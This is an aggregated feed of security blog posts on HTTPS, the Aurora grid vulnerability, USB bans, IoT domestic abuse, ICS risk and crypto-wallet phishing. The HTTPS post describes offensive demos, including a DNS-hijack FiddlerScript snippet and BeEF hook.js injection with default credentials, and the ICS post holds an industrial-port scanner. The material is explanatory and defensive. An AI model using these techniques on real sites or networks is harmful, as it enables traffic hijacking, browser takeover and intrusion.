The post Cortana security flaw means your PC may be compromised appeared first on Panda Security Mediacenter.

Communication: A Significant Cultural Change for Embracing DevOps

Organizations can reap huge rewards by switching to a DevOps software development model, yet some enterprises don’t know how to make the change. Recognizing that fact, I’ve spent the past few weeks discussing the benefits of a DevOps model, outlining how organizations can plan their transition, identifying problems that companies commonly encounter and enumerating steps […]… Read More

The post Communication: A Significant Cultural Change for Embracing DevOps appeared first on The State of Security.

Here’s Why Your Static Website Needs HTTPS



It was January last year that I suggested HTTPS adoption had passed the "tipping point", that is, it had passed the moment of critical mass and, as I said at the time, "will very shortly become the norm". Since that time, the percentage of web pages loaded over a secure connection has rocketed from 52% to 71%, whilst the proportion of the world's top 1 million websites redirecting people to HTTPS has gone from 20% to about half (projected). The rapid adoption has been driven by a combination of ever more visible browser warnings (it was Chrome and Firefox's changes which prompted the aforementioned tipping point post), more easily accessible certificates via both Let's Encrypt and Cloudflare, and a growing awareness of the risks that unencrypted traffic presents. Even governments have been pushing to drive adoption of HTTPS for all sites, for example in this post by the National Cyber Security Centre in the UK:

all websites should use HTTPS, even if they don't include private content, sign-in pages, or credit card details

However, there remains an undercurrent of dissent; Scott Helme recently wrote about this and dispelled many of the myths people have for not securing their traffic. I shared some thoughts on what I suspect the real objection is in the tweet thread beginning with this one just a few days ago:

In one of many robust internet debates (as is prone to happen on Twitter), the discussion turned to the value proposition of HTTPS on a static website. Is it needed? Does it do any good? What's it actually protecting? I'd been looking for an opportunity to put together some material on precisely this topic so when a discussion eventually led to just such an offer, it seemed like the perfect time to write this post:

And just to be extra, extra sure this was Jacob's intention, he did later extend the same offer to another party and also (quite rightly in my opinion) observed that permission really isn't necessary to man in the middle your own traffic! So that's precisely what I've done - intercepted my own traffic passed over an insecure connection and put together a string of demos in a 24-minute video explaining why HTTPS is necessary on a static website. Here's the video and there's references and code samples for all the demos used immediately after that:

HTTPS Is Easy

The HTTPS Is Easy video series is 4 short videos of about 5 minutes each that make it dead simple to serve almost any site over a secure connection. Not only is the video series awesome (IMHO), the awesome community of people who've watched it has already translated closed captions into 16 different languages, making HTTPS more accessible to more people than ever!

WiFi Pineapple

The Wifi Pineapple is a super-easy little device made by Hak5 that's not only easy to stand up as a wireless hotspot, but can also trick devices into thinking it's a known network that they automatically connect to without any user interaction whatsoever. I've done a heap of writing on this little device and regularly use it at conferences and training events.

ClippyJS

Everybody loves a bit of Clippy, just so long as it's in jest! I did this demo with ClippyJS and if you really want to relive the memories of days gone by, you can also embed Merlin, Rover and Links then orchestrate their behaviour via a set of actions invoked in the JS.

Cornify

Who doesn't love unicorns, right?! Cornify will help you liven up those otherwise dull pages with magical beasts and rainbows. Comes complete with Cornify buttons to add to your website (or someone else's).

Harlem Shake

There's actually a bit more to this than just entertainment value: the Harlem Shake has regularly been used as a "proof" for running script on a vulnerable site. For example, check out how it's used when embedded in the TXT record of a DNS entry which is then loaded into a WHOIS service which doesn't properly output encode the results. There's also Brenno de Winter's excellent example of XSS flaws in Dutch banks, again, demonstrated via a lot of shaking. Grab the entire script and then inject as required.

Cryptominer

I used Coinhive which offers to "Monetise Your Business With Your Users' CPU Power". Frankly, it's a pretty shady service regularly abused for malicious purposes but that was precisely what was required in this situation.

Router CSRF Exploit

This is from CVE-2018-12529 and the sample exploit was taken from the SecurityResearch101 blog. We've often seen CSRF attacks against routers result in DNS hijacking which, of course, is yet another risk that HTTPS protects against. We've known about this for years, including how the proceeds of this crime have been used to pay for Brazilian prostitutes.

DNS Hijacking

This was done with just a few lines of FiddlerScript in the OnBeforeRequest event:

if (oSession.HostnameIs("btlr.com")) {
  // Serve any request addressed to btlr.com from scripting.com instead
  oSession.hostname = "scripting.com";
}

Were you using a device such as the Wifi Pineapple, you could achieve the same result using DNSspoof. The outcome is identical: traffic going to one insecure address results in traffic from a totally different address being returned.

China's Great Cannon

This was the attack back in 2015 that sought to take down GitHub, or at least the repository greatfire.org maintains there. I showed the de-obfuscated version in the video which you can find on Pastebin. The original version and a more detailed technical writeup on the incident can be found in this piece from Netresec. Incidentally, Baidu still doesn't serve their homepage over HTTPS by default (although they can serve a valid cert if explicitly requested over HTTPS), which gives the service the unenviable title of being the world's largest website not to do so, according to Alexa.

BeEF

This, to me, was the most impactful demo not just because it resulted in pushing malware and phishing attacks to the target website, but because it shows just how much control an attacker can take over the browsing experience of victims on that site. Check out the BeEF project website for more background on that and if you want to implement the demo I ran, go and grab Kali Linux from VMDepot (now rolled into the Azure Marketplace) and deploy it directly into an Azure VM (I used the smallest size and it worked fine). I allowed inbound requests on port 80 as well as port 22 so I could SSH in. I then changed the port from 3000 to 80 in the config.yaml file (refer to the BeEF config documentation), included a script file from [vm ip]/hook.js in the victim site and browsed over to [vm ip]/ui/panel, then logged in with "beef" and "beef". That's it!

Rick Roll

This one needs no introduction, going on half a billion views on YouTube, it's the surprise gift that keeps on giving!

The Aurora Power Grid Vulnerability and the BlackEnergy Trojan

At recent Industrial IoT security briefings, the Aurora vulnerability has come up repeatedly. Attendees ask, “Is our country’s power grid safe? How can we protect the grid? What is Aurora?” This post provides a look at Aurora, and the BlackEnergy attack that can exploit Aurora.

In March 2007, the US Department of Energy demonstrated the Aurora vulnerability. (See this video from CNN of the actual test: https://www.youtube.com/watch?v=fJyWngDco3g). What is happening?

An electric generator spins an electromagnet (the rotor) inside a coil of wire (the stator) to create electric power. The energy spinning the rotor can come from falling water in a hydroelectric power dam, from burning oil in a diesel generator, from steam created by nuclear fission in a nuclear power plant, or from the wind in a windmill. That electric power feeds the power grid for distribution to homes and businesses.

Other generators are also feeding the same grid. In the US, the power on the grid is 60-cycle (60 Hz) alternating current. That means the voltage swings from its positive to its negative value sixty times per second. As long as the generator is in phase with the rest of the grid, its power will smoothly contribute to the total power of the grid. If the generator gets out of phase, that is, if its output is not synchronized with the power of the grid, the generator is working against the entire power of the rest of the grid.

DoE’s experiment used a 2.25 MW diesel generator. The Aurora vulnerability allows an attacker to disconnect the generator from the grid just long enough to get slightly out of phase with the grid, and then reconnect it. This desynchronization puts a sudden, severe strain on the rotor, which causes a pulse of mechanical energy to shake the generator, damaging the bearings and causing sudden increases in temperature. By disconnecting and reconnecting the generator’s circuit to the grid, the Aurora vulnerability led to the generator’s destruction in about three minutes.

In this test, though, the separate attack cycles (opening the breaker then closing it again) were not continuous. The DoE wanted to get readings from the generator as the attack progressed. In the wild, an attack would take much less time.

Mitigating the Aurora attack

To keep generators from self-destructing, the manufacturers build in safety systems that do not allow a generator to reconnect to the grid if it has been disconnected for 15 cycles (¼ of a second). Some generators may use mechanical relays. More commonly, the safety systems are software-controlled. For monitoring and operations, these systems are network-connected.

The separate open/close cycles in the Aurora attack take less than ¼ second. The attack happens before the safety systems can react.
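The timing can be made concrete with toy numbers. The frequency drift and disconnect duration below are illustrative assumptions, not measurements from the DoE test:

```python
GRID_HZ = 60.0                      # US grid frequency
SAFETY_WINDOW_S = 15 / GRID_HZ      # 15-cycle reconnect lockout = 0.25 s
DRIFT_HZ = 0.5                      # assumed frequency drift while off-grid
ATTACK_DISCONNECT_S = 0.2           # assumed open/close cycle, inside the window

# Phase error accumulates for as long as the generator free-runs off-grid.
phase_slip_deg = 360.0 * DRIFT_HZ * ATTACK_DISCONNECT_S
print(SAFETY_WINDOW_S, phase_slip_deg)  # prints: 0.25 36.0
```

Even with these modest assumed numbers, a sub-window disconnect reconnects the generator tens of degrees out of phase, and each repeated open/close cycle delivers another mechanical shock before the protection relays can intervene.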

At present, the protections in place are inadequate to mitigate the Aurora attack.

Enter BlackEnergy

BlackEnergy is a Trojan that can launch DDoS attacks, download custom spam, and steal banking credentials. Trend Micro’s Security Intelligence Blog posted a detailed description of the malware in this article in February 2016: https://blog.trendmicro.com/trendlabs-security-intelligence/killdisk-and-blackenergy-are-not-just-energy-sector-threats/. This malware has evolved since it was first detected in 2007. An updated variant was observed in 2010. In Nov 2015 BlackEnergy was discovered in attacks against power, mining, and rail companies in Ukraine, including the Dec 23, 2015 attack that cut power to 225,000 people.

The attack used BlackEnergy, delivered through phishing emails directed at employees and others involved with the target companies. The payload included the KillDisk malware, which attackers used to disable boot capabilities on target systems. This prevented their restoration, blocked remote access to systems, and rendered Uninterruptable Power Supply (UPS) systems useless. It also disrupted Serial-to-Ethernet devices. This damage delayed recovery considerably. Most systems could not be used until their firmware had been restored.  See https://ics-cert.us-cert.gov/alerts/IR-ALERT-H-16-056-01 from the US Department of Homeland Security Industrial Control Systems Cyber Emergency Response Team (DHS ICS-CERT).

Attack, Response, and Mitigation

The attack against Ukraine succeeded because the attackers completed comprehensive reconnaissance over months. They knew the specific equipment in use at each facility, they established backdoors in Human-Machine Interface (HMI) devices at those facilities, and they understood the recovery protocols and procedures at those facilities. They knew that disabling the Serial-to-Ethernet devices would make remote management impossible, stretching personnel to maintain operations and slowing remediation and recovery. They knew which UPSs to disable and how. They were prepared to lock operators out of their consoles (personnel reported that the cursors on the screens moved and could not be interrupted by the keyboard or mouse at the console).

Most importantly, the attackers did not fully exploit the Aurora vulnerability. No generators were destroyed. Power was restored in hours. If generators had been destroyed, recovery could have taken months. Most large generators are custom-built, not sold from inventory. Rebuilding the power grid would have taken months and cost millions of dollars. And further, destroying the generators would have been an act of war. The attack was a threat.

The US power grid is equally vulnerable. Power distribution and generation organizations must segment their networks. Scan for malware. Maintain and analyze logs. Prepare for contingencies. Lock down systems. Isolate insecure devices.

What do you think? Post a comment below, or tweet me @WilliamMalikTM.

The post The Aurora Power Grid Vulnerability and the BlackEnergy Trojan appeared first on .

Popular Software Site Hacked to Redirect Users to Keylogger, Infostealer, More

Hackers have breached the website of VSDC, a popular company that provides free audio and video conversion and editing software. Three different incidents have been recorded during which hackers changed the download links on the VSDC website with links that initiated downloads from servers operated by the attackers.

View Full Story

ORIGINAL SOURCE: Bleeping Computer

The post Popular Software Site Hacked to Redirect Users to Keylogger, Infostealer, More appeared first on IT SECURITY GURU.

Is banning USB drives the key to better security behaviour?

Convenience often beats security where users are concerned. Take USB keys, for example. They’re a very handy way to transfer files between computers, but they’re also a huge security risk. IBM recently attempted to take the drastic step of banning all removable portable storage devices (e.g. USB sticks, SD cards, flash drives) completely. Should others follow suit?

To explore this issue deeper, I spoke to Neha Thethi, senior cybersecurity analyst at BH Consulting. She said for an attacker who has physical access to the victim’s machine, USB sticks are an effective way to install malicious software on a device or a network. Human nature being what it is, unsuspecting users will often plug unknown drives into their computers. From there, attackers have multiple ways to compromise a victim’s machine.

In fact, a classic tactic for security experts to test an organisation’s security awareness levels is to drop infected USB drives in a public area as part of a ‘red team’ exercise. If a percentage of employees picks up a key and plugs it into their machine, it’s a useful indicator of gaps in that organisation’s security.

Alternatives for file sharing

In Neha’s experience, given the current file sharing technologies available, many employees don’t need to use USBs for general tasks anyway. “We have found that restricting USB keys can definitely work. Most users in an organisation don’t really need access to those ports,” she said. Even where colleagues might need to share documents, it’s easier and safer to use a cloud service approved by their organisation.

But before banning USBs (or other removable media) outright, Neha recommends taking these five steps:

  • Discover what data you have
  • Know where you are storing the data
  • Classify the data according to its importance
  • Carry out a risk assessment for the most important data
  • Protect the data based on the level of risk – including encryption if necessary.
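
The five steps above could be strung together as a toy risk-scoring helper. This Python sketch is purely illustrative: the classification labels, exposure weights, and threshold are our assumptions, not a methodology from BH Consulting:

```python
# Steps 1-2: discover what data you have and where it lives (hypothetical inventory)
inventory = [
    {"name": "payroll.xlsx", "store": "file server", "classification": "confidential"},
    {"name": "brochure.pdf", "store": "website",     "classification": "public"},
    {"name": "clients.db",   "store": "laptop",      "classification": "confidential"},
]

# Steps 3-4: classify the data and assess risk. Toy scoring: sensitive data
# on portable storage scores highest.
SENSITIVITY = {"public": 0, "internal": 1, "confidential": 2}
EXPOSURE = {"website": 0, "file server": 1, "laptop": 2, "usb drive": 3}

def risk_score(item):
    return SENSITIVITY[item["classification"]] * EXPOSURE[item["store"]]

# Step 5: protect based on the level of risk, e.g. encrypt above a threshold
for item in sorted(inventory, key=risk_score, reverse=True):
    action = "encrypt" if risk_score(item) >= 2 else "monitor"
    print(f"{item['name']}: score {risk_score(item)} -> {action}")
```

In practice the assessment would be driven by an expert review rather than two lookup tables, but the sketch shows why classification has to come before protection: the same file warrants different controls depending on where it is stored.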

A company can take some of the steps by itself, but it’s best to use the experience of a security specialist within the company or a third party to carry out the security risk assessment. “The assessment should be conducted with the help of an expert team based on the type of industry and service you provide. Otherwise, you end up with an inaccurate picture of the security risks the organisation faces,” she said.

Prepare for pushback

If a USB ban is identified as a risk treatment measure, be prepared for pushback from some employees. Some of that will stem from company culture. Is the organisation reliant on rules, or do staff expect a degree of freedom? “Not everyone will give a round of applause for more security, because it is a hindrance and an extra step,” Neha warned. “Expect and anticipate pushback and therefore put in place incentives for blocking USBs. If people aren’t happy and are not on board with the change, it leads to them bending the rules.”

In some cases, there may be genuine exceptions to a no-USB rule. IBM itself faced pushback and is reportedly considering a few exemptions. Neha also gave the example of a media company that uses high-quality digital photographs for its work. While it restricted USB ports for all employees, it made an exception for its media person, who needed to transfer those high-quality images from the camera to a company device. Their specific role meant they got formal approval to have their USB port enabled.

Banning USB sticks should be workable in many cases, because better, more convenient and secure alternatives exist in the form of cloud sharing platforms. But as with most security measures, it always helps to be prepared and to plan for multiple scenarios.

The post Is banning USB drives the key to better security behaviour? appeared first on BH Consulting.

Finding Connections in the Global Village

To commemorate F-Secure’s 30th year of innovation, we’re profiling 30 of our fellows from our more than 25 offices around the globe.

The global village can be a pretty great place to live. But it can still be a challenge working across distances or boundaries – whether they be cultural, logistical, linguistic, or whatever else. It’s a challenge that F-Secure’s Jani Kallio has taken on since he joined the company with F-Secure’s acquisition of cyber security firm nSense in 2015.

“At nSense I started building our Security & Risk Management consulting practice as the Global Practice Leader. But during the 2 years since we joined F-Secure, I left that responsibility and my great team of 15 consultants, and transitioned to a business development role,” explains Jani. “Now, one of my key tasks is to prepare expansion opportunities for our consulting business through M&A.”

And Jani’s favorite part of this is finding common ground between different people – what he calls “a common language”. It’s something he’s been doing while based in London, since F-Secure acquired Digital Assurance Consulting – a small but reputable penetration testing company. Part of that process was his relocation to the city with his wife and daughter in summer 2017.

It’s a skill Jani uses to help F-Secure consulting expand further. “The best part of my job is when I’m able to identify similarities in cultures and untapped potentials which we could address together for mutual benefit,” said Jani. “When trying to motivate entrepreneurs into selling their company, it’s all about people. I need to sell the idea of F-Secure as a new home. It’s actually kind a match making process and it doesn’t work if you are not able to sell a joint vision.”

The cyber security business is still all about security, and you have to know what it means to customers, but Jani thinks it might surprise some people how differently that is seen across industries.

“In a single day, I can be in talks about the technical details of a security vulnerability with a consultant, discounted cash flow variables with a M&A advisor, business strategies with a senior entrepreneur, and coverage of cyber insurance with a broker or underwriter. It is a privilege, really, to be involved in so many different fields with different people.”

In terms of career advice, Jani has a few suggestions on how people could progress in the cyber security business.

“Choose a team who you can learn from, preferably strong in other areas than your own background. Choose a boss who believes in you. Share what you know with the people around you. And never stop learning, because this world will never slow down to wait for you to catch up.“

And if you’re looking for a career that will take you to different countries, remember to find things you have in common with the people around you, because there are bound to be differences. Some of them are really small, as Jani discovered while working in London.

“Londoners have lunch over their keyboards and eat a good 2 hours later than I’m used to. Most restaurants do not even serve proper lunch before 12:00 in Soho, which is one thing I’m still getting used to.”

After Jani’s interview, F-Secure announced the acquisition of MWR InfoSecurity, a privately held cyber security company with close to 400 employees and operating globally from its HQ in London and other offices in the UK, the US, South Africa and Singapore.

And check out our open positions if you want to join Jani and the hundreds of other great fellows fighting to keep internet users safe from online threats.

IoT domestic abuse: What can we do to stop it?

Some 40 years ago, the sci-fi/horror film Demon Seed told the tale of a woman slowly imprisoned by a sentient AI, which invaded the smart home system her husband had designed. The AI locked doors and windows, turned off communications, and even put a synthesised version of her onscreen at the front door to reassure visitors she was “fine.”

The reality, of course, is that she was anything but. There have been endless works of fiction in which the smart technology micromanaging the home environment goes rogue. Sadly, those works of fiction are bleeding over into reality.

In 2018, we suddenly have the real-world equivalent playing out in homes and behind closed doors. We’ll talk about the present day problems momentarily, but first let’s take a look at how we got here by casting our eye back about 15 years.

PC spyware and password theft

For years, a subset of abusive partners with technical know-how have placed spyware on computers or mobile devices, stolen passwords, and generally kept tabs on their other half. This could often lead to violence, and as a result, many strategies for defending against this have been drawn up over the years. I effectively became involved in security due to a tech-related abuse case, and I’ve given many talks on this subject dating back to 2006 alongside representatives from NNEDV (National Network to End Domestic Violence).

Consumer spyware is a huge problem, and tech giants such as Google are funding programs designed to help abused spouses out of technological abuse scenarios.

The mobile wave and social control

After PC-based spyware became a tool of the trade for abusers, there came an upswing in “coercive control,” the act of demanding to check emails, texts, direct messages and more sent to mobile phones. Abusive partners demanding to see SMS messages has always been a thing, but taking your entire online existence and dumping it into a pocket-sized device was always going to raise the stakes for people up to no good.

Coercive control is such a serious problem that the UK has specific laws against it, with the act becoming a crime in 2015. Should you be found guilty, you can expect to find yourself looking at a maximum of five years’ imprisonment, a fine, or both in the worst cases. From the description of coercive control:

Coercive or controlling behaviour does not relate to a single incident, it is a purposeful pattern of incidents that occur over time in order for one individual to exert power, control, or coercion over another.

Keep the “purposeful pattern of incidents occurring over time in order for an individual to exert power or control” description in mind as we move on to the next section about Internet of Things (IoT) abuse, because it’s relevant.

Internet of Things: total control

An Internet of Things control hub could be a complex remote cloud service powering a multitude of devices, but for most people, it’s a device that sits in the home and helps to power and control appliances and other systems, typically with some level of Internet access and the possibility of additional control via smartphone. It could just be in charge of security cameras or motion sensors, or it might be the total package: heating and cooling, lighting, windows, door locks, fire alarms, ovens, water temperature—pretty much anything you can think of.

It hasn’t taken long for abusive partners to take advantage of this newly-embedded functionality, with numerous tales of them making life miserable for their loved ones, effectively trapped in a 24/7 reworking of a sci-fi dystopian home.

Their cruelty is only limited by what they can’t hook into the overall network. Locking the spouse into their place of residence then cranking up the heat, blasting them with cold, flicking lights on and off, disabling services, recording conversations, triggering loud security alarms; the abused partner is almost entirely at their mercy.

There are all sorts of weird implications thrown up by this sort of real-world abuse of technologies and individuals. What happens if someone has an adverse reaction to severe temperature change? An epileptic fit due to rapidly flickering lights? How about someone turning off smoke alarms or emergency police response technology and then the place burns down or someone breaks in?

Someone could well be responsible for a death, but how would law enforcement figure it out, much less know where to pin the blame?

Of course, those are situations where spouses are still living together. There are also scenarios where the couple has separated, but the abuser still has access to the IoT tech, and they proceed to mess with their lives remotely. One is somewhat more straightforward to approach than the other, but neither are particularly great for the person on the receiving end.

A daunting challenge

Unfortunately, this is a tough nut to crack. Generally speaking, advice given to survivors of domestic abuse tends to err on the side of extreme caution, because if the abuser notices the slightest irregularity, they’ll seek retribution. With computers and more “traditional” forms of tech-based skullduggery, there are usually a few slices of wiggle room.

For example, an abused partner may have a mobile device, which is immediately out of reach from the abuser the moment they go outside—assuming they haven’t tampered with it. On desktop, Incognito mode browsing is useful, as are domestic abuse websites which offer tips and fast close buttons in case the abuser happens to be nearby.

Even then, though, there’s risk: the abuser may keep network logs or use surveillance software, and attempts to “hide” the browsing data may raise suspicions. In fact, this is one example where websites slowly moving to HTTPS is beneficial, because an abuser monitoring the network can’t see the page content. Even so, they may still see which sites were visited, and then you’re back to square one.

With IoT, everything is considerably more difficult in domestic abuse situations.

A lot of IoT tech is incredibly insecure because functionality is where it’s at; security, not so much. That’s why you see so many stories about webcams beamed across the Internet, or toys doing weird things, or the occasional Internet-connected toaster going rogue.

The main hubs powering everything in the home tend to be pretty locked down by comparison, especially if they’re a name brand like Alexa or Nest.

In these situations, the more locked down the device, the more difficult it is to suggest evasion solutions for people under threat. They can hardly jump in and start secretly tampering with the technology without notice—frankly, people tend to notice a physical device misbehaving a lot faster than they’d notice a covert piece of spyware designed to grab emails from a laptop.

All sorts of weird things can go wrong with some purchased spyware. Maybe there’s a server it needs to phone home to, but the server’s temporarily offline or has been shut down. Perhaps the Internet connection is a bit flaky, and it isn’t sending data back to base. What if the coder wasn’t good and something randomly started to fall apart? There are so many variables involved that a lot of abusers might not know what to do about it.

However, a standard bit of off-the-shelf IoT kit is expected to function in a certain way, and when it suddenly doesn’t? The abuser is going to know about it.

Tackling the problem

Despite the challenges, there are some things we can do to at least gain a foothold against domestic attackers.

1) Keep a record: with the standard caveat that doing action X may attract attention Y, a log is a mainstay of abuse cases. Pretty much everyone who’s experienced this abuse and talks about it publicly will say the same thing: be mindful of how obvious your record is. A book may work for some, text obfuscated in code may work for others (though it could attract unwarranted interest if discovered). It may be easier to hide a book than to keep an abuser away from your laptop.

Of course, adjust to the situation at hand; if you’re not living with the abusive partner anymore, they’re probably not reading your paper journal kept in a cupboard. How about a mobile app? There are tools where you can detail information that isn’t saved on the device via programs designed to look like weather apps. If you can build up a picture of every time the heating becomes unbearable, or the lights go into overdrive, or alarms start buzzing, this is valuable data for law enforcement.

2) Correlation is a wonderful thing. Many of the most popular devices will keep detailed statistics of use. Nest, for example, “collects usage statistics of the device” (2.1, User Privacy) as referenced in this Black Hat paper [PDF]. If someone eventually goes to the police with their records, and law enforcement are able to obtain usage statistics for (say) extreme temperature fluctuations, or locked doors, or lightbulbs going berserk, then things quickly look problematic for the abuser.

This would especially be the case where device-recorded statistics match whatever you’ve written in your physical journal or saved to your secure mobile app.
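
A minimal sketch of that correlation idea: pair hand-kept journal entries with device events that fall within a tolerance window. The timestamps, field names, and events below are invented for illustration, not drawn from any real hub’s export format:

```python
from datetime import datetime, timedelta

journal = [
    ("2018-06-03 22:10", "heat cranked to maximum"),
    ("2018-06-05 01:30", "lights flickering"),
]

# Hypothetical usage statistics pulled from a smart-home hub
device_events = [
    ("2018-06-03 22:12", "thermostat set to 35C by remote user"),
    ("2018-06-07 09:00", "door unlocked"),
]

def correlate(journal, events, window_minutes=30):
    """Pair journal entries with device events close in time."""
    window = timedelta(minutes=window_minutes)
    matches = []
    for jt, jnote in journal:
        j = datetime.strptime(jt, "%Y-%m-%d %H:%M")
        for et, enote in events:
            e = datetime.strptime(et, "%Y-%m-%d %H:%M")
            if abs(e - j) <= window:
                matches.append((jnote, enote))
    return matches

print(correlate(journal, device_events))
```

Even one or two matches like this, timestamped and independently recorded, are far more persuasive to law enforcement than an unanchored account.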

3) This is a pretty new problem that’s come to light, and most of the discussions about it in tech circles are filled with tech people saying, “I had no idea this was a thing until now.” If there is a local shelter for abused spouses and you’re good with this area of tech/security/privacy, you may wish to pop in and see if there’s anything you could do to help pass on useful information. It’s likely they don’t have anyone on staff who can help with this particular case. The more we share with each other, the more we can support abused partners to overcome their situations.

4) If you’ve escaped an abusive spouse but you’ve brought tech with you, there’s no guarantee it hasn’t been utterly compromised. Did both of you have admin access to the devices? Have you changed the password(s) since moving? What kind of information is revealed in the admin console? Does it mention IP addresses used, perhaps geographical location, or maybe a new email address you used to set things up again? If you’ve been experiencing strange goings on in your home since plugging everything back in, and they resemble the type of trickery listed up above, it’s quite possible the abusive partner is still up to no good.

We’ve spotted at least one example where an org has performed an IoT scrub job. The idea of “ghosting” them, that is, keeping at least one compromised device running to make the abuser think all is well, is an interesting one, but potentially not without risk. If it’s at all possible, our advice is to trash all pieces of tech brought along for the ride. IoT is such a complex thing to set up, with so many moving parts, that it’s impossible to say for sure that everything has been technologically exorcised.

No quick fix

It’d be great if there was some sort of technological magic bullet that could fix this problem, but as you’ll see from digging around the “IoT scrub job” thread, a lot of security pros are only just starting to understand this type of digitized assault, as well as the best ways to go about combatting it. As with all things domestic abuse, caution is key, and we shouldn’t rush to give advice that could potentially put someone in greater danger. Frustratingly, a surprising number of the top results in search engines for help with these types of attack result in 404 error pages or websites that simply don’t exist anymore.

Clearly, we all need to up our game in technology circles and see what we can do to take this IoT-enabled horror show out of action before it spirals out of control. As IoT continues to integrate itself into people’s day-to-day existence, in ways that can’t easily be ripped out afterwards, the potential for massive harm to the most vulnerable members of society is staring us in the face. We absolutely must rise to the challenge.

The post IoT domestic abuse: What can we do to stop it? appeared first on Malwarebytes Labs.

How the Industry 4.0 Era Will Change the Cybersecurity Landscape

Today’s highly automated and connected smart factories (Industry 4.0) were born out of yesterday’s steam engines that mechanized manufacturing (Industry 1.0); mass-production lines expanded with the advent of electricity (Industry 2.0); and then IT-enabled manufacturing plants with programmable logic controllers (PLCs) ushered in the era of connected industrial control systems (Industry 3.0).

While enterprises struggle to enhance their operational efficiency, customer experience, logistics, and supply chain gains through IoT use, their malicious counterparts may be expending just as many resources to undermine their efforts. We have seen attacks adversely affect an enterprise’s bottom line in the past. Cases in point include a DDoS attack on Dyn’s servers that brought down major sites, including PayPal, Spotify, Netflix, and Twitter in October 2016 and an IT failure that drove British Airways to freeze thousands of its Executive Club frequent-flier accounts in March 2017 after confirming unauthorized activity from a third party.

In December last year, TRITON/TRISIS reared its ugly head, and can be considered the latest addition to ICS attackers’ armory. ICS lie at the core of the cyber-physical systems that characterize the Industry 4.0 era. The TRITON/TRISIS attack showed that at the hands of determined threat actors, a single piece of malicious code could have physical repercussions.

In the Industry 4.0 era, enterprises not only need to worry about the usual business disrupters—natural disasters, adverse publicity, and loss of key personnel, among others—but also increasingly sophisticated cyberthreats targeting critical infrastructure and the smart devices that we use to virtually control them. Modern ICS are prone to vulnerabilities that attackers can exploit to get into target networks. Industrial robots or any connected system that remains exposed can easily be scanned for vulnerabilities that, when exploited, can lead to the production of defective goods. Insufficiently secured IoT devices, when hacked, can be used to instigate DDoS and other business-crippling attacks.
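
As a sketch of what “easily scanned for vulnerabilities” means in practice, the following Python snippet checks whether a host accepts connections on well-known industrial protocol ports. The port numbers are real conventions (Modbus/TCP on 502, EtherNet/IP on 44818, S7comm on 102); everything else is illustrative, and such a check should of course only be run against systems you own or are authorized to test:

```python
import socket

# Well-known industrial protocol ports and the protocols they conventionally carry
ICS_PORTS = {502: "Modbus/TCP", 44818: "EtherNet/IP", 102: "S7comm"}

def exposed_ports(host, ports=ICS_PORTS, timeout=0.5):
    """Return {port: protocol} for ports on `host` that accept a TCP connection."""
    found = {}
    for port, name in ports.items():
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            # connect_ex returns 0 on a successful TCP handshake
            if s.connect_ex((host, port)) == 0:
                found[port] = name
    return found
```

An attacker running essentially this loop across an address range is all it takes to find an exposed controller, which is why such devices belong behind a segmented, firewalled network rather than on a routable one.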

We are bound to see more of these as companies increasingly embrace the advantages that smart factories, industrial robots, and the many other components that make up IIoT-enabled environments and the Industry 4.0 era offer. Enterprises will need to mitigate risks more than ever. They will need an integrated approach to security that begins with a cybersecurity framework. Any secure smart environment should have a sound foundation that uses next-generation intrusion detection and prevention, application whitelisting, integrity monitoring, virtual patching, advance sandboxing analysis, machine learning, behavior analysis, antimalware, risk detection, vulnerability assessment, next-generation firewall, anti-spear-phishing, spam protection, and data leakage technologies. Deploying a risk-reducing architecture and staying abreast of the latest in cybersecurity (threats and possible mitigation steps) by relying on trusted partners are also a must to protect all connected devices and environments on all fronts.

Read more about mitigating risks in today’s smart environments in IIoT Security Risk Mitigation in the Industry 4.0 Era.

The post How the Industry 4.0 Era Will Change the Cybersecurity Landscape appeared first on .

The Five Stages of Vulnerability Management

A key to having a good information security program within your organization is having a good vulnerability management program. Most, if not all, regulatory policies and information security frameworks advise having a strong vulnerability management program as one of the first things an organization should do when building their information security program. The Center for […]… Read More

The post The Five Stages of Vulnerability Management appeared first on The State of Security.

Hola VPN Hack Targets MyEtherWallet Users

MyEtherWallet (MEW), a well-known cryptocurrency wallet interface, used Twitter to urge MEW customers who used Hola VPN within the last 24 hours to transfer their funds immediately to a brand-new account. They said they received a report confirming that the Hola VPN Chrome extension had been hacked. MEW’s Twitter account stated the attack was logging users’ activity, including sensitive information such as usernames and passwords. The details of a currently unknown number of MEW users were exposed to hackers during a five-hour window on July 9th.

Hola VPN said in a blog post that upon learning about the incident, they immediately set up a response team of cybersecurity experts to investigate the incident and prevent it from happening again. They claim they immediately took emergency steps to replace the malicious extension causing the data leak. Regular MEW users were not affected by the data breach as the MEW service was not compromised, and the incident is known to be entirely out of MEW developers’ control. However, the breach certainly casts a shadow over the Israeli VPN service provider.

This is not the first time MEW users have been targeted. Earlier this year hackers managed to snatch more than $300,000 through execution of a sophisticated DNS hijacking attack. Many users lost their funds forever. Services such as MyEtherWallet do not operate like banks – they do not charge transaction fees, they do not offer insurance, and they do not store cryptocurrency. Instead, they provide users with an interface that allows their clients to interact directly with the blockchain. Hugely unregulated and still in its wild west years, blockchain is like a vast, global, decentralized spreadsheet, and users are the only ones responsible for the funds they store on such virtual wallet interfaces.

How to protect yourself?

First and foremost, use common sense and make sure that the sites you are visiting are legitimate. If you are a MEW user, your website needs to be https://www.myetherwallet.com. Even if a single letter in the URL is changed, you are not in the correct place, and you are being phished.

Avoid opening websites that feel sketchy, or you do not trust – clicking on random links you see on social media may end up forwarding you to malicious sites. If you want to access a specific website, open a new tab on your browser and type the correct link manually. Navigating directly to the website decreases the chances of ending up on a phishing website.
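
The “check every letter” advice can be automated. A minimal Python sketch comparing a link’s hostname against the exact expected value (the MEW address is the one given above; the helper name is our own invention):

```python
from urllib.parse import urlparse

EXPECTED = "www.myetherwallet.com"

def looks_legitimate(url, expected_host=EXPECTED):
    """True only for an exact HTTPS hostname match - lookalikes fail."""
    parsed = urlparse(url)
    return parsed.scheme == "https" and parsed.hostname == expected_host

print(looks_legitimate("https://www.myetherwallet.com/"))  # genuine address
print(looks_legitimate("https://www.myetherwaIlet.com/"))  # capital-I lookalike
print(looks_legitimate("http://www.myetherwallet.com/"))   # no TLS
```

Browsers and password managers apply the same principle: an exact origin match, never a “close enough” one, which is exactly why a single changed letter means you are being phished.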

Do not use the same password on other websites. One of the worst cybersecurity practices is to use the same password on multiple sites. If you struggle to remember your passwords, use tools that allow you to keep them safe and protected, or write them on a piece of paper. Make sure to change your passwords every three months – sometimes it takes years for companies to announce that they have been hacked.

